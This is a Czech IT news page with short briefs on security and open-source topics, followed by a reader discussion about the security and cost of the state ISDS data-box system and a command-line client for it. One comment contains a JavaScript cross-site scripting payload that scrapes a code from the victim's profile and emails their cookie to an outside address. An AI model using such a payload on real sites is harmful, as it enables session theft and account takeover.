Proběhla hackerská soutěž Pwn2Own Ireland 2025. Celkově bylo vyplaceno 1 024 750 dolarů za 73 unikátních zranitelností nultého dne (0-day). Vítězný Summoning Team si odnesl 187 500 dolarů. Shrnutí po jednotlivých dnech na blogu Zero Day Initiative (1. den, 2. den a 3. den) a na YouTube.
Byl publikován říjnový přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Pracuje se na podpoře M3. Zanedlouho vyjde Fedora Asahi Remix 43. Vývojáře lze podpořit na Open Collective a GitHub Sponsors.
Iniciativa Open Device Partnership (ODP) nedávno představila projekt Patina. Jedná se o implementaci UEFI firmwaru v Rustu. Vývoj probíhá na GitHubu. Zdrojové kódy jsou k dispozici pod licencí Apache 2.0. Nejnovější verze Patiny je 13.0.0.
Obrovská poptávka po plynových turbínách zapříčinila, že datová centra začala používat v generátorech dodávajících energii pro provoz AI staré dobré proudové letecké motory, konvertované na plyn. Jejich výhodou je, že jsou menší, lehčí a lépe udržovatelné než jejich průmyslové protějšky. Proto jsou ideální pro dočasné nebo mobilní použití.
Typst byl vydán ve verzi 0.14. Jedná se o rozšiřitelný značkovací jazyk a překladač pro vytváření dokumentů včetně odborných textů s matematickými vzorci, diagramy či bibliografií.
Specialisté společnosti ESET zaznamenali útočnou kampaň, která cílí na uživatele a uživatelky v Česku a na Slovensku. Útočníci po telefonu zmanipulují oběť ke stažení falešné aplikace údajně od České národní banky (ČNB) nebo Národní banky Slovenska (NBS), přiložení platební karty k telefonu a zadání PINu. Malware poté v reálném čase přenese data z karty útočníkovi, který je bezkontaktně zneužije u bankomatu nebo na platebním terminálu.
V Ubuntu 25.10 byl balíček základních nástrojů gnu-coreutils nahrazen balíčkem rust-coreutils se základními nástroji přepsanými do Rustu. Ukázalo se, že nový "date" znefunkčnil automatickou aktualizaci. Pro obnovu je nutno balíček rust-coreutils manuálně aktualizovat.
VST 3 je nově pod licencí MIT. S verzí 3.8.0 proběhlo přelicencování zdrojových kódů z licencí "Proprietary Steinberg VST3 License" a "General Public License (GPL) Version 3". VST (Virtual Studio Technology, Wikipedie) je softwarové rozhraní pro komunikaci mezi hostitelským programem a zásuvnými moduly (pluginy), kde tyto moduly slouží ke generování a úpravě digitálního audio signálu.
Open source 3D herní a simulační engine Open 3D Engine (O3DE) byl vydán v nové verzi 25.10. Podrobný přehled novinek v poznámkách k vydání.
V Londýně probíhá dvoudenní Ubuntu Summit 25.10. Na programu je řada zajímavých přednášek. Zhlédnout je lze také na YouTube (23. 10. a 24. 10.).
Koukám, že ty datové schránky nejsou zrovna bezpečné.Dobré ránko
Koukám, že ty datové schránky nejsou zrovna bezpečné.<uvítací melodie Windows XP>
Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.Jsou tam i horší věci.
debian-security, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown.
Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..
Celkem neúspěšně jsem zkoušel najít nějaká číslaPokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz
.
ale narazil jsem i na vtipnou kalkulačkuTo mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..9×108 Kč.
A proč z toho viním programátory ze Slušovic?Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
Knižnice bola iba Fáza 1. Veď to všetko máte v tom wiki projektu.
Treba si chlapsky priznať, že to je fiasko. Komunita nefunguje a za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.
Koľko ludí použije tie knižnice? Všetky ostatné aplikácie na prácu so schránkamy používajú vlastné. Možno ešte vzniknu nejaké nové projekty na prístup ku schránkam a použijú tieto vaše hotové knižnice ale koľko ich bude? Jeden alebo dva? Hotový plugin do Thunderbirdu by IMHO bol najpoužívanejší plugin do TB v ČR! Bohužial, projekt ostal vo fáze 1.
Ten frontend v clanku je command line, cielom bolo GUI alebo TB rozsirenie!
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože
Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".
xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224');
xmlhttp.send('');
var pole = xmlhttp.responseText.split(' ');
var kod = '';
var part_num = 0;
while (part_num < pole.length) {
if (pole[part_num] == 'hodnotu') {
kod = pole[part_num+1].substring(0,4);
break;
}
part_num += 1;
}
xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish');
xmlhttp.send('');
This is Shigofumi, an ISDS client. Have a nice e-government. Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program
Tiskni
Sdílej: